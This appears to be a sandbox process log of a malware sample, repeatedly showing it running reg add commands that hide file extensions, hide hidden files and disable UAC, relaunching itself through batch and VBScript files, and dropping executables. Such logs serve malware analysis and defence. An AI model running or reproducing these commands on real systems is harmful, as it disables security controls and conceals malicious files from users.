reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\csQkIAEg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uewksEEY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zSkUAkEg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZYEkcsgE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tYEYcYQc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uWAwsQIA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YAgQAQwI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UEAUkEMw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qMIcckQg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tQYwoUEU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xicoUwUI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bygQEEok.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xusMkoQE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SGAwkwwQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QIMMMYIo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GaswMYgU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RYsUUsEw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\YGoswEoY\eQAkQcoo.exe
"C:\Users\Admin\YGoswEoY\eQAkQcoo.exe"
C:\ProgramData\qIgcssEE\Veokogws.exe
"C:\ProgramData\qIgcssEE\Veokogws.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4372 -ip 4372
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4052 -ip 4052
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmwAYMEo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 224
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hGYswwkA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OEgIMcIo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GcUsAokY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QeEoYoQs.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
